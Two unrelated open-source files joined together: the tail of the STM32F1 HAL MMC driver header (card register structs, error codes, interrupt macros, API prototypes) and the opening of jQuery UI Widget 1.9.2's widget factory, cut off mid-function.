  __IO uint8_t  DSRImpl;              /*!< DSR implemented                       */
  __IO uint8_t  Reserved2;            /*!< Reserved                              */
  __IO uint32_t DeviceSize;           /*!< Device Size                           */
  __IO uint8_t  MaxRdCurrentVDDMin;   /*!< Max. read current @ VDD min           */
  __IO uint8_t  MaxRdCurrentVDDMax;   /*!< Max. read current @ VDD max           */
  __IO uint8_t  MaxWrCurrentVDDMin;   /*!< Max. write current @ VDD min          */
  __IO uint8_t  MaxWrCurrentVDDMax;   /*!< Max. write current @ VDD max          */
  __IO uint8_t  DeviceSizeMul;        /*!< Device size multiplier                */
  __IO uint8_t  EraseGrSize;          /*!< Erase group size                      */
  __IO uint8_t  EraseGrMul;           /*!< Erase group size multiplier           */
  __IO uint8_t  WrProtectGrSize;      /*!< Write protect group size              */
  __IO uint8_t  WrProtectGrEnable;    /*!< Write protect group enable            */
  __IO uint8_t  ManDeflECC;           /*!< Manufacturer default ECC              */
  __IO uint8_t  WrSpeedFact;          /*!< Write speed factor                    */
  __IO uint8_t  MaxWrBlockLen;        /*!< Max. write data block length          */
  __IO uint8_t  WriteBlockPaPartial;  /*!< Partial blocks for write allowed      */
  __IO uint8_t  Reserved3;            /*!< Reserved                              */
  __IO uint8_t  ContentProtectAppli;  /*!< Content protection application        */
  __IO uint8_t  FileFormatGrouop;     /*!< File format group (field name typo kept for ABI/source compatibility) */
  __IO uint8_t  CopyFlag;             /*!< Copy flag (OTP)                       */
  __IO uint8_t  PermWrProtect;        /*!< Permanent write protection            */
  __IO uint8_t  TempWrProtect;        /*!< Temporary write protection            */
  __IO uint8_t  FileFormat;           /*!< File format                           */
  __IO uint8_t  ECC;                  /*!< ECC code                              */
  __IO uint8_t  CSD_CRC;              /*!< CSD CRC                               */
  __IO uint8_t  Reserved4;            /*!< Always 1                              */
}HAL_MMC_CardCSDTypeDef;
/**
* @}
*/
/** @defgroup MMC_Exported_Types_Group5 Card Identification Data: CID Register
* @{
*/
/* Decoded view of the Card Identification (CID) register fields. */
typedef struct
{
  __IO uint8_t  ManufacturerID;  /*!< Manufacturer ID       */
  __IO uint16_t OEM_AppliID;     /*!< OEM/Application ID    */
  __IO uint32_t ProdName1;       /*!< Product Name part1    */
  __IO uint8_t  ProdName2;       /*!< Product Name part2    */
  __IO uint8_t  ProdRev;         /*!< Product Revision      */
  __IO uint32_t ProdSN;          /*!< Product Serial Number */
  __IO uint8_t  Reserved1;       /*!< Reserved1             */
  __IO uint16_t ManufactDate;    /*!< Manufacturing Date    */
  __IO uint8_t  CID_CRC;         /*!< CID CRC               */
  __IO uint8_t  Reserved2;       /*!< Always 1              */
}HAL_MMC_CardCIDTypeDef;
/**
* @}
*/
/** @defgroup MMC_Exported_Types_Group6 MMC Card Status returned by ACMD13
* @{
*/
/* Extended card status fields (per the header's defgroup: as returned by ACMD13). */
typedef struct
{
  __IO uint8_t  DataBusWidth;       /*!< Shows the currently defined data bus width                 */
  __IO uint8_t  SecuredMode;        /*!< Card is in secured mode of operation                       */
  __IO uint16_t CardType;           /*!< Carries information about card type                        */
  __IO uint32_t ProtectedAreaSize;  /*!< Carries information about the capacity of protected area   */
  __IO uint8_t  SpeedClass;         /*!< Carries information about the speed class of the card      */
  __IO uint8_t  PerformanceMove;    /*!< Carries information about the card's performance move      */
  __IO uint8_t  AllocationUnitSize; /*!< Carries information about the card's allocation unit size  */
  __IO uint16_t EraseSize;          /*!< Determines the number of AUs to be erased in one operation */
  __IO uint8_t  EraseTimeout;       /*!< Determines the timeout for any number of AU erase          */
  __IO uint8_t  EraseOffset;        /*!< Carries information about the erase offset                 */
}HAL_MMC_CardStatusTypeDef;
/**
* @}
*/
/**
* @}
*/
/* Exported constants --------------------------------------------------------*/
/** @defgroup MMC_Exported_Constants Exported Constants
* @{
*/
#define BLOCKSIZE   512U                 /*!< Block size is 512 bytes           */
#define CAPACITY    0x400000U            /*!< Logical block number for 2 GByte cards */
/** @defgroup MMC_Exported_Constansts_Group1 MMC Error status enumeration Structure definition
* @{
*/
/* MMC error codes: thin aliases over the shared SDMMC low-layer error codes,
   reported through hmmc->ErrorCode. */
#define HAL_MMC_ERROR_NONE                   SDMMC_ERROR_NONE                    /*!< No error                                                      */
#define HAL_MMC_ERROR_CMD_CRC_FAIL           SDMMC_ERROR_CMD_CRC_FAIL            /*!< Command response received (but CRC check failed)              */
#define HAL_MMC_ERROR_DATA_CRC_FAIL          SDMMC_ERROR_DATA_CRC_FAIL           /*!< Data block sent/received (CRC check failed)                   */
#define HAL_MMC_ERROR_CMD_RSP_TIMEOUT        SDMMC_ERROR_CMD_RSP_TIMEOUT         /*!< Command response timeout                                      */
#define HAL_MMC_ERROR_DATA_TIMEOUT           SDMMC_ERROR_DATA_TIMEOUT            /*!< Data timeout                                                  */
#define HAL_MMC_ERROR_TX_UNDERRUN            SDMMC_ERROR_TX_UNDERRUN             /*!< Transmit FIFO underrun                                        */
#define HAL_MMC_ERROR_RX_OVERRUN             SDMMC_ERROR_RX_OVERRUN              /*!< Receive FIFO overrun                                          */
#define HAL_MMC_ERROR_ADDR_MISALIGNED        SDMMC_ERROR_ADDR_MISALIGNED         /*!< Misaligned address                                            */
#define HAL_MMC_ERROR_BLOCK_LEN_ERR          SDMMC_ERROR_BLOCK_LEN_ERR           /*!< Transferred block length is not allowed for the card or the
                                                                                      number of transferred bytes does not match the block length   */
#define HAL_MMC_ERROR_ERASE_SEQ_ERR          SDMMC_ERROR_ERASE_SEQ_ERR           /*!< An error in the sequence of erase command occurs              */
#define HAL_MMC_ERROR_BAD_ERASE_PARAM        SDMMC_ERROR_BAD_ERASE_PARAM         /*!< An invalid selection for erase groups                         */
#define HAL_MMC_ERROR_WRITE_PROT_VIOLATION   SDMMC_ERROR_WRITE_PROT_VIOLATION    /*!< Attempt to program a write protect block                      */
#define HAL_MMC_ERROR_LOCK_UNLOCK_FAILED     SDMMC_ERROR_LOCK_UNLOCK_FAILED      /*!< Sequence or password error has been detected in unlock
                                                                                      command or if there was an attempt to access a locked card    */
#define HAL_MMC_ERROR_COM_CRC_FAILED         SDMMC_ERROR_COM_CRC_FAILED          /*!< CRC check of the previous command failed                      */
#define HAL_MMC_ERROR_ILLEGAL_CMD            SDMMC_ERROR_ILLEGAL_CMD             /*!< Command is not legal for the card state                       */
#define HAL_MMC_ERROR_CARD_ECC_FAILED        SDMMC_ERROR_CARD_ECC_FAILED         /*!< Card internal ECC was applied but failed to correct the data  */
#define HAL_MMC_ERROR_CC_ERR                 SDMMC_ERROR_CC_ERR                  /*!< Internal card controller error                                */
#define HAL_MMC_ERROR_GENERAL_UNKNOWN_ERR    SDMMC_ERROR_GENERAL_UNKNOWN_ERR     /*!< General or unknown error                                      */
#define HAL_MMC_ERROR_STREAM_READ_UNDERRUN   SDMMC_ERROR_STREAM_READ_UNDERRUN    /*!< The card could not sustain data reading in stream mode        */
#define HAL_MMC_ERROR_STREAM_WRITE_OVERRUN   SDMMC_ERROR_STREAM_WRITE_OVERRUN    /*!< The card could not sustain data programming in stream mode    */
#define HAL_MMC_ERROR_CID_CSD_OVERWRITE      SDMMC_ERROR_CID_CSD_OVERWRITE       /*!< CID/CSD overwrite error                                       */
#define HAL_MMC_ERROR_WP_ERASE_SKIP          SDMMC_ERROR_WP_ERASE_SKIP           /*!< Only partial address space was erased                         */
#define HAL_MMC_ERROR_CARD_ECC_DISABLED      SDMMC_ERROR_CARD_ECC_DISABLED       /*!< Command has been executed without using internal ECC          */
#define HAL_MMC_ERROR_ERASE_RESET            SDMMC_ERROR_ERASE_RESET             /*!< Erase sequence was cleared before executing because an out
                                                                                      of erase sequence command was received                        */
#define HAL_MMC_ERROR_AKE_SEQ_ERR            SDMMC_ERROR_AKE_SEQ_ERR             /*!< Error in sequence of authentication                           */
#define HAL_MMC_ERROR_INVALID_VOLTRANGE      SDMMC_ERROR_INVALID_VOLTRANGE       /*!< Error in case of invalid voltage range                        */
#define HAL_MMC_ERROR_ADDR_OUT_OF_RANGE      SDMMC_ERROR_ADDR_OUT_OF_RANGE       /*!< Error when addressed block is out of range                    */
#define HAL_MMC_ERROR_REQUEST_NOT_APPLICABLE SDMMC_ERROR_REQUEST_NOT_APPLICABLE  /*!< Error when command request is not applicable                  */
#define HAL_MMC_ERROR_PARAM                  SDMMC_ERROR_INVALID_PARAMETER       /*!< the used parameter is not valid                               */
#define HAL_MMC_ERROR_UNSUPPORTED_FEATURE    SDMMC_ERROR_UNSUPPORTED_FEATURE     /*!< Error when feature is not supported                           */
#define HAL_MMC_ERROR_BUSY                   SDMMC_ERROR_BUSY                    /*!< Error when transfer process is busy                           */
#define HAL_MMC_ERROR_DMA                    SDMMC_ERROR_DMA                     /*!< Error while DMA transfer                                      */
#define HAL_MMC_ERROR_TIMEOUT                SDMMC_ERROR_TIMEOUT                 /*!< Timeout error                                                 */
/**
* @}
*/
/** @defgroup MMC_Exported_Constansts_Group2 MMC context enumeration structure
* @{
*/
/* Transfer-context flags held in hmmc->Context. Operation flags (read/write,
   single/multiple block) can be combined with a mode flag (IT or DMA). */
#define   MMC_CONTEXT_NONE                 0x00000000U   /*!< None                             */
#define   MMC_CONTEXT_READ_SINGLE_BLOCK    0x00000001U   /*!< Read single block operation      */
#define   MMC_CONTEXT_READ_MULTIPLE_BLOCK  0x00000002U   /*!< Read multiple blocks operation   */
#define   MMC_CONTEXT_WRITE_SINGLE_BLOCK   0x00000010U   /*!< Write single block operation     */
#define   MMC_CONTEXT_WRITE_MULTIPLE_BLOCK 0x00000020U   /*!< Write multiple blocks operation  */
#define   MMC_CONTEXT_IT                   0x00000008U   /*!< Process in Interrupt mode        */
#define   MMC_CONTEXT_DMA                  0x00000080U   /*!< Process in DMA mode              */
/**
* @}
*/
/** @defgroup MMC_Exported_Constansts_Group3 MMC Voltage mode
* @{
*/
/**
* @brief
*/
/* OCR argument values used during card initialization (CMD1 operand). */
#define MMC_HIGH_VOLTAGE_RANGE         0x80FF8000U  /*!< VALUE OF ARGUMENT            */
#define MMC_DUAL_VOLTAGE_RANGE         0x80FF8080U  /*!< VALUE OF ARGUMENT            */
#define eMMC_HIGH_VOLTAGE_RANGE        0xC0FF8000U  /*!< for eMMC > 2Gb sector mode   */
#define eMMC_DUAL_VOLTAGE_RANGE        0xC0FF8080U  /*!< for eMMC > 2Gb sector mode   */
#define MMC_INVALID_VOLTAGE_RANGE      0x0001FF01U  /*!< sentinel: not a valid OCR voltage window */
/**
* @}
*/
/** @defgroup MMC_Exported_Constansts_Group4 MMC Memory Cards
* @{
*/
/* Detected card voltage class (see MMC_*_VOLTAGE_RANGE above). */
#define MMC_HIGH_VOLTAGE_CARD     0x00000000U  /*!< high-voltage-only card */
#define MMC_DUAL_VOLTAGE_CARD     0x00000001U  /*!< dual-voltage card      */
/**
* @}
*/
/**
* @}
*/
/* Exported macro ------------------------------------------------------------*/
/** @defgroup MMC_Exported_macros MMC Exported Macros
* @brief macros to handle interrupts and specific clock configurations
* @{
*/
/**
  * @brief  Enable the MMC device (SDIO clock to the card).
  * @retval None
  */
#define __HAL_MMC_ENABLE(__HANDLE__) __SDIO_ENABLE((__HANDLE__)->Instance)

/**
  * @brief  Disable the MMC device.
  * @retval None
  */
#define __HAL_MMC_DISABLE(__HANDLE__) __SDIO_DISABLE((__HANDLE__)->Instance)

/**
  * @brief  Enable the SDMMC DMA transfer.
  * @retval None
  */
#define __HAL_MMC_DMA_ENABLE(__HANDLE__) __SDIO_DMA_ENABLE((__HANDLE__)->Instance)

/**
  * @brief  Disable the SDMMC DMA transfer.
  * @retval None
  */
#define __HAL_MMC_DMA_DISABLE(__HANDLE__)  __SDIO_DMA_DISABLE((__HANDLE__)->Instance)

/**
  * @brief  Enable the MMC device interrupt.
  * @param  __HANDLE__: MMC Handle
  * @param  __INTERRUPT__: SDMMC interrupt source(s) to enable. Any combination of
  *         the SDIO_IT_* flags declared in stm32f1xx_ll_sdmmc.h, e.g.:
  *         SDIO_IT_CCRCFAIL, SDIO_IT_DCRCFAIL, SDIO_IT_CTIMEOUT, SDIO_IT_DTIMEOUT,
  *         SDIO_IT_TXUNDERR, SDIO_IT_RXOVERR, SDIO_IT_CMDREND, SDIO_IT_CMDSENT,
  *         SDIO_IT_DATAEND, SDIO_IT_DBCKEND, SDIO_IT_CMDACT, SDIO_IT_TXACT,
  *         SDIO_IT_RXACT, SDIO_IT_TXFIFOHE, SDIO_IT_RXFIFOHF, SDIO_IT_TXFIFOF,
  *         SDIO_IT_RXFIFOF, SDIO_IT_TXFIFOE, SDIO_IT_RXFIFOE, SDIO_IT_TXDAVL,
  *         SDIO_IT_RXDAVL, SDIO_IT_SDIOIT.
  * @retval None
  */
#define __HAL_MMC_ENABLE_IT(__HANDLE__, __INTERRUPT__) __SDIO_ENABLE_IT((__HANDLE__)->Instance, (__INTERRUPT__))

/**
  * @brief  Disable the MMC device interrupt.
  * @param  __HANDLE__: MMC Handle
  * @param  __INTERRUPT__: SDMMC interrupt source(s) to disable; same SDIO_IT_*
  *         flag set as for __HAL_MMC_ENABLE_IT above.
  * @retval None
  */
#define __HAL_MMC_DISABLE_IT(__HANDLE__, __INTERRUPT__) __SDIO_DISABLE_IT((__HANDLE__)->Instance, (__INTERRUPT__))
/**
* @brief Check whether the specified MMC flag is set or not.
* @param __HANDLE__: MMC Handle
* @param __FLAG__: specifies the flag to check.
* This parameter can be one of the following values:
* @arg SDIO_FLAG_CCRCFAIL: Command response received (CRC check failed)
* @arg SDIO_FLAG_DCRCFAIL: Data block sent/received (CRC check failed)
* @arg SDIO_FLAG_CTIMEOUT: Command response timeout
* @arg SDIO_FLAG_DTIMEOUT: Data timeout
* @arg SDIO_FLAG_TXUNDERR: Transmit FIFO underrun error
* @arg SDIO_FLAG_RXOVERR: Received FIFO overrun error
* @arg SDIO_FLAG_CMDREND: Command response received (CRC check passed)
* @arg SDIO_FLAG_CMDSENT: Command sent (no response required)
* @arg SDIO_FLAG_DATAEND: Data end (data counter, SDIDCOUNT, is zero)
* @arg SDIO_FLAG_DBCKEND: Data block sent/received (CRC check passed)
* @arg SDIO_FLAG_CMDACT: Command transfer in progress
* @arg SDIO_FLAG_TXACT: Data transmit in progress
* @arg SDIO_FLAG_RXACT: Data receive in progress
* @arg SDIO_FLAG_TXFIFOHE: Transmit FIFO Half Empty
* @arg SDIO_FLAG_RXFIFOHF: Receive FIFO Half Full
* @arg SDIO_FLAG_TXFIFOF: Transmit FIFO full
* @arg SDIO_FLAG_RXFIFOF: Receive FIFO full
* @arg SDIO_FLAG_TXFIFOE: Transmit FIFO empty
* @arg SDIO_FLAG_RXFIFOE: Receive FIFO empty
* @arg SDIO_FLAG_TXDAVL: Data available in transmit FIFO
* @arg SDIO_FLAG_RXDAVL: Data available in receive FIFO
* @arg SDIO_FLAG_SDIOIT: SD I/O interrupt received
* @retval The new state of MMC FLAG (SET or RESET).
*/
#define __HAL_MMC_GET_FLAG(__HANDLE__, __FLAG__) __SDIO_GET_FLAG((__HANDLE__)->Instance, (__FLAG__))
/**
* @brief Clear the MMC's pending flags.
* @param __HANDLE__: MMC Handle
* @param __FLAG__: specifies the flag to clear.
* This parameter can be one or a combination of the following values:
* @arg SDIO_FLAG_CCRCFAIL: Command response received (CRC check failed)
* @arg SDIO_FLAG_DCRCFAIL: Data block sent/received (CRC check failed)
* @arg SDIO_FLAG_CTIMEOUT: Command response timeout
* @arg SDIO_FLAG_DTIMEOUT: Data timeout
* @arg SDIO_FLAG_TXUNDERR: Transmit FIFO underrun error
* @arg SDIO_FLAG_RXOVERR: Received FIFO overrun error
* @arg SDIO_FLAG_CMDREND: Command response received (CRC check passed)
* @arg SDIO_FLAG_CMDSENT: Command sent (no response required)
* @arg SDIO_FLAG_DATAEND: Data end (data counter, SDIDCOUNT, is zero)
* @arg SDIO_FLAG_DBCKEND: Data block sent/received (CRC check passed)
* @arg SDIO_FLAG_SDIOIT: SD I/O interrupt received
* @retval None
*/
#define __HAL_MMC_CLEAR_FLAG(__HANDLE__, __FLAG__) __SDIO_CLEAR_FLAG((__HANDLE__)->Instance, (__FLAG__))
/**
* @brief Check whether the specified MMC interrupt has occurred or not.
* @param __HANDLE__: MMC Handle
* @param __INTERRUPT__: specifies the SDMMC interrupt source to check.
* This parameter can be one of the following values:
* @arg SDIO_IT_CCRCFAIL: Command response received (CRC check failed) interrupt
* @arg SDIO_IT_DCRCFAIL: Data block sent/received (CRC check failed) interrupt
* @arg SDIO_IT_CTIMEOUT: Command response timeout interrupt
* @arg SDIO_IT_DTIMEOUT: Data timeout interrupt
* @arg SDIO_IT_TXUNDERR: Transmit FIFO underrun error interrupt
* @arg SDIO_IT_RXOVERR: Received FIFO overrun error interrupt
* @arg SDIO_IT_CMDREND: Command response received (CRC check passed) interrupt
* @arg SDIO_IT_CMDSENT: Command sent (no response required) interrupt
* @arg SDIO_IT_DATAEND: Data end (data counter, SDIDCOUNT, is zero) interrupt
* @arg SDIO_IT_DBCKEND: Data block sent/received (CRC check passed) interrupt
* @arg SDIO_IT_CMDACT: Command transfer in progress interrupt
* @arg SDIO_IT_TXACT: Data transmit in progress interrupt
* @arg SDIO_IT_RXACT: Data receive in progress interrupt
* @arg SDIO_IT_TXFIFOHE: Transmit FIFO Half Empty interrupt
* @arg SDIO_IT_RXFIFOHF: Receive FIFO Half Full interrupt
* @arg SDIO_IT_TXFIFOF: Transmit FIFO full interrupt
* @arg SDIO_IT_RXFIFOF: Receive FIFO full interrupt
* @arg SDIO_IT_TXFIFOE: Transmit FIFO empty interrupt
* @arg SDIO_IT_RXFIFOE: Receive FIFO empty interrupt
* @arg SDIO_IT_TXDAVL: Data available in transmit FIFO interrupt
* @arg SDIO_IT_RXDAVL: Data available in receive FIFO interrupt
* @arg SDIO_IT_SDIOIT: SD I/O interrupt received interrupt
* @retval The new state of MMC IT (SET or RESET).
*/
#define __HAL_MMC_GET_IT(__HANDLE__, __INTERRUPT__) __SDIO_GET_IT((__HANDLE__)->Instance, (__INTERRUPT__))
/**
* @brief Clear the MMC's interrupt pending bits.
* @param __HANDLE__: MMC Handle
* @param __INTERRUPT__: specifies the interrupt pending bit to clear.
* This parameter can be one or a combination of the following values:
* @arg SDIO_IT_CCRCFAIL: Command response received (CRC check failed) interrupt
* @arg SDIO_IT_DCRCFAIL: Data block sent/received (CRC check failed) interrupt
* @arg SDIO_IT_CTIMEOUT: Command response timeout interrupt
* @arg SDIO_IT_DTIMEOUT: Data timeout interrupt
* @arg SDIO_IT_TXUNDERR: Transmit FIFO underrun error interrupt
* @arg SDIO_IT_RXOVERR: Received FIFO overrun error interrupt
* @arg SDIO_IT_CMDREND: Command response received (CRC check passed) interrupt
* @arg SDIO_IT_CMDSENT: Command sent (no response required) interrupt
* @arg SDIO_IT_DATAEND: Data end (data counter, SDMMC_DCOUNT, is zero) interrupt
* @arg SDIO_IT_SDIOIT: SD I/O interrupt received interrupt
* @retval None
*/
#define __HAL_MMC_CLEAR_IT(__HANDLE__, __INTERRUPT__) __SDIO_CLEAR_IT((__HANDLE__)->Instance, (__INTERRUPT__))
/**
* @}
*/
/* Exported functions --------------------------------------------------------*/
/** @defgroup MMC_Exported_Functions MMC Exported Functions
* @{
*/
/** @defgroup MMC_Exported_Functions_Group1 Initialization and de-initialization functions
* @{
*/
HAL_StatusTypeDef HAL_MMC_Init(MMC_HandleTypeDef *hmmc);
HAL_StatusTypeDef HAL_MMC_InitCard(MMC_HandleTypeDef *hmmc);
HAL_StatusTypeDef HAL_MMC_DeInit (MMC_HandleTypeDef *hmmc);
void HAL_MMC_MspInit(MMC_HandleTypeDef *hmmc);
void HAL_MMC_MspDeInit(MMC_HandleTypeDef *hmmc);
/**
* @}
*/
/** @defgroup MMC_Exported_Functions_Group2 Input and Output operation functions
* @{
*/
/* Blocking mode: Polling */
HAL_StatusTypeDef HAL_MMC_ReadBlocks(MMC_HandleTypeDef *hmmc, uint8_t *pData, uint32_t BlockAdd, uint32_t NumberOfBlocks, uint32_t Timeout);
HAL_StatusTypeDef HAL_MMC_WriteBlocks(MMC_HandleTypeDef *hmmc, uint8_t *pData, uint32_t BlockAdd, uint32_t NumberOfBlocks, uint32_t Timeout);
HAL_StatusTypeDef HAL_MMC_Erase(MMC_HandleTypeDef *hmmc, uint32_t BlockStartAdd, uint32_t BlockEndAdd);
/* Non-Blocking mode: IT */
HAL_StatusTypeDef HAL_MMC_ReadBlocks_IT(MMC_HandleTypeDef *hmmc, uint8_t *pData, uint32_t BlockAdd, uint32_t NumberOfBlocks);
HAL_StatusTypeDef HAL_MMC_WriteBlocks_IT(MMC_HandleTypeDef *hmmc, uint8_t *pData, uint32_t BlockAdd, uint32_t NumberOfBlocks);
/* Non-Blocking mode: DMA */
HAL_StatusTypeDef HAL_MMC_ReadBlocks_DMA(MMC_HandleTypeDef *hmmc, uint8_t *pData, uint32_t BlockAdd, uint32_t NumberOfBlocks);
HAL_StatusTypeDef HAL_MMC_WriteBlocks_DMA(MMC_HandleTypeDef *hmmc, uint8_t *pData, uint32_t BlockAdd, uint32_t NumberOfBlocks);
void HAL_MMC_IRQHandler(MMC_HandleTypeDef *hmmc);
/* Callback in non blocking modes (DMA) */
void HAL_MMC_TxCpltCallback(MMC_HandleTypeDef *hmmc);
void HAL_MMC_RxCpltCallback(MMC_HandleTypeDef *hmmc);
void HAL_MMC_ErrorCallback(MMC_HandleTypeDef *hmmc);
void HAL_MMC_AbortCallback(MMC_HandleTypeDef *hmmc);
/**
* @}
*/
/** @defgroup MMC_Exported_Functions_Group3 Peripheral Control functions
* @{
*/
HAL_StatusTypeDef HAL_MMC_ConfigWideBusOperation(MMC_HandleTypeDef *hmmc, uint32_t WideMode);
/**
* @}
*/
/** @defgroup MMC_Exported_Functions_Group4 MMC card related functions
* @{
*/
HAL_MMC_CardStateTypeDef HAL_MMC_GetCardState(MMC_HandleTypeDef *hmmc);
HAL_StatusTypeDef HAL_MMC_GetCardCID(MMC_HandleTypeDef *hmmc, HAL_MMC_CardCIDTypeDef *pCID);
HAL_StatusTypeDef HAL_MMC_GetCardCSD(MMC_HandleTypeDef *hmmc, HAL_MMC_CardCSDTypeDef *pCSD);
HAL_StatusTypeDef HAL_MMC_GetCardInfo(MMC_HandleTypeDef *hmmc, HAL_MMC_CardInfoTypeDef *pCardInfo);
/**
* @}
*/
/** @defgroup MMC_Exported_Functions_Group5 Peripheral State and Errors functions
* @{
*/
HAL_MMC_StateTypeDef HAL_MMC_GetState(MMC_HandleTypeDef *hmmc);
uint32_t HAL_MMC_GetError(MMC_HandleTypeDef *hmmc);
/**
* @}
*/
/** @defgroup MMC_Exported_Functions_Group6 Peripheral Abort management
* @{
*/
HAL_StatusTypeDef HAL_MMC_Abort(MMC_HandleTypeDef *hmmc);
HAL_StatusTypeDef HAL_MMC_Abort_IT(MMC_HandleTypeDef *hmmc);
/**
* @}
*/
/* Private types -------------------------------------------------------------*/
/** @defgroup MMC_Private_Types MMC Private Types
* @{
*/
/**
* @}
*/
/* Private defines -----------------------------------------------------------*/
/** @defgroup MMC_Private_Defines MMC Private Defines
* @{
*/
/**
* @}
*/
/* Private variables ---------------------------------------------------------*/
/** @defgroup MMC_Private_Variables MMC Private Variables
* @{
*/
/**
* @}
*/
/* Private constants ---------------------------------------------------------*/
/** @defgroup MMC_Private_Constants MMC Private Constants
* @{
*/
/**
* @}
*/
/* Private macros ------------------------------------------------------------*/
/** @defgroup MMC_Private_Macros MMC Private Macros
* @{
*/
/**
* @}
*/
/* Private functions prototypes ----------------------------------------------*/
/** @defgroup MMC_Private_Functions_Prototypes MMC Private Functions Prototypes
* @{
*/
/**
* @}
*/
/* Private functions ---------------------------------------------------------*/
/** @defgroup MMC_Private_Functions MMC Private Functions
* @{
*/
/**
* @}
*/
/**
* @}
*/
/**
* @}
*/
/**
* @}
*/
#endif /* STM32F103xE || STM32F103xG */
#ifdef __cplusplus
}
#endif
#endif /* __STM32F1xx_HAL_MMC_H */
/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/
| {
"pile_set_name": "Github"
} |
/*!
* jQuery UI Widget 1.9.2
* http://jqueryui.com
*
* Copyright 2012 jQuery Foundation and other contributors
* Released under the MIT license.
* http://jquery.org/license
*
* http://api.jqueryui.com/jQuery.widget/
*/
(function( $, undefined ) {
var uuid = 0,
slice = Array.prototype.slice,
_cleanData = $.cleanData;
// Wrap jQuery's cleanData so widgets get a "remove" notification (and can
// destroy themselves) before their elements are torn down.
$.cleanData = function( elems ) {
	var index = 0,
		node = elems[ 0 ];
	while ( node != null ) {
		// Swallow any handler errors; see http://bugs.jquery.com/ticket/8235
		try {
			$( node ).triggerHandler( "remove" );
		} catch ( err ) {}
		node = elems[ ++index ];
	}
	_cleanData( elems );
};
/**
 * Widget factory: defines $.<namespace>.<name> from `prototype`, optionally
 * inheriting from `base` (defaults to $.Widget), registers a plugin bridge
 * on $.fn and a ":<namespace>-<name>" custom selector, and re-wires any
 * widgets that previously inherited from a redefined widget.
 */
$.widget = function( name, base, prototype ) {
var fullName, existingConstructor, constructor, basePrototype,
namespace = name.split( "." )[ 0 ];
name = name.split( "." )[ 1 ];
fullName = namespace + "-" + name;
// Two-argument form: $.widget( "ns.name", protoObj ) inherits from $.Widget.
if ( !prototype ) {
prototype = base;
base = $.Widget;
}
// create selector for plugin
$.expr[ ":" ][ fullName.toLowerCase() ] = function( elem ) {
return !!$.data( elem, fullName );
};
$[ namespace ] = $[ namespace ] || {};
existingConstructor = $[ namespace ][ name ];
constructor = $[ namespace ][ name ] = function( options, element ) {
// allow instantiation without "new" keyword
if ( !this._createWidget ) {
return new constructor( options, element );
}
// allow instantiation without initializing for simple inheritance
// must use "new" keyword (the code above always passes args)
if ( arguments.length ) {
this._createWidget( options, element );
}
};
// extend with the existing constructor to carry over any static properties
$.extend( constructor, existingConstructor, {
version: prototype.version,
// copy the object used to create the prototype in case we need to
// redefine the widget later
_proto: $.extend( {}, prototype ),
// track widgets that inherit from this widget in case this widget is
// redefined after a widget inherits from it
_childConstructors: []
});
basePrototype = new base();
// we need to make the options hash a property directly on the new instance
// otherwise we'll modify the options hash on the prototype that we're
// inheriting from
basePrototype.options = $.widget.extend( {}, basePrototype.options );
// Wrap every function so it can call this._super()/this._superApply();
// previous values are saved and restored, so nested/re-entrant calls work.
$.each( prototype, function( prop, value ) {
if ( $.isFunction( value ) ) {
prototype[ prop ] = (function() {
var _super = function() {
return base.prototype[ prop ].apply( this, arguments );
},
_superApply = function( args ) {
return base.prototype[ prop ].apply( this, args );
};
return function() {
var __super = this._super,
__superApply = this._superApply,
returnValue;
this._super = _super;
this._superApply = _superApply;
returnValue = value.apply( this, arguments );
this._super = __super;
this._superApply = __superApply;
return returnValue;
};
})();
}
});
constructor.prototype = $.widget.extend( basePrototype, {
// TODO: remove support for widgetEventPrefix
// always use the name + a colon as the prefix, e.g., draggable:start
// don't prefix for widgets that aren't DOM-based
widgetEventPrefix: existingConstructor ? basePrototype.widgetEventPrefix : name
}, prototype, {
constructor: constructor,
namespace: namespace,
widgetName: name,
// TODO remove widgetBaseClass, see #8155
widgetBaseClass: fullName,
widgetFullName: fullName
});
// If this widget is being redefined then we need to find all widgets that
// are inheriting from it and redefine all of them so that they inherit from
// the new version of this widget. We're essentially trying to replace one
// level in the prototype chain.
if ( existingConstructor ) {
$.each( existingConstructor._childConstructors, function( i, child ) {
var childPrototype = child.prototype;
// redefine the child widget using the same prototype that was
// originally used, but inherit from the new version of the base
$.widget( childPrototype.namespace + "." + childPrototype.widgetName, constructor, child._proto );
});
// remove the list of existing child constructors from the old constructor
// so the old child constructors can be garbage collected
delete existingConstructor._childConstructors;
} else {
base._childConstructors.push( constructor );
}
$.widget.bridge( name, constructor );
};
// Deep-extend used by the widget factory: own, defined properties from each
// source are merged into `target`. Plain objects are cloned recursively;
// everything else (arrays, functions, DOM nodes...) is copied by reference.
$.widget.extend = function( target ) {
	var sources = slice.call( arguments, 1 ),
		i = 0,
		key,
		value;
	for ( ; i < sources.length; i++ ) {
		for ( key in sources[ i ] ) {
			// Read the value first, then filter to own, defined properties
			// (matches the original evaluation order).
			value = sources[ i ][ key ];
			if ( sources[ i ].hasOwnProperty( key ) && value !== undefined ) {
				if ( $.isPlainObject( value ) ) {
					// Never deep-merge onto a non-plain-object target value
					target[ key ] = $.isPlainObject( target[ key ] ) ?
						$.widget.extend( {}, target[ key ], value ) :
						$.widget.extend( {}, value );
				} else {
					target[ key ] = value;
				}
			}
		}
	}
	return target;
};
/**
 * Creates the jQuery plugin $.fn[ name ]. A string argument is routed to the
 * same-named instance method on each element (underscore-prefixed methods are
 * rejected); any other argument either constructs new widget instances or
 * re-applies options to existing ones.
 */
$.widget.bridge = function( name, object ) {
var fullName = object.prototype.widgetFullName || name;
$.fn[ name ] = function( options ) {
var isMethodCall = typeof options === "string",
args = slice.call( arguments, 1 ),
returnValue = this;
// allow multiple hashes to be passed on init
options = !isMethodCall && args.length ?
$.widget.extend.apply( null, [ options ].concat(args) ) :
options;
if ( isMethodCall ) {
this.each(function() {
var methodValue,
instance = $.data( this, fullName );
if ( !instance ) {
return $.error( "cannot call methods on " + name + " prior to initialization; " +
"attempted to call method '" + options + "'" );
}
if ( !$.isFunction( instance[options] ) || options.charAt( 0 ) === "_" ) {
return $.error( "no such method '" + options + "' for " + name + " widget instance" );
}
methodValue = instance[ options ].apply( instance, args );
// A method return value other than the instance (or undefined) stops the
// iteration and becomes the plugin's return value; jQuery objects are
// pushStack-ed so .end() still works.
if ( methodValue !== instance && methodValue !== undefined ) {
returnValue = methodValue && methodValue.jquery ?
returnValue.pushStack( methodValue.get() ) :
methodValue;
return false;
}
});
} else {
this.each(function() {
var instance = $.data( this, fullName );
if ( instance ) {
// Already constructed: merge new options and re-run _init
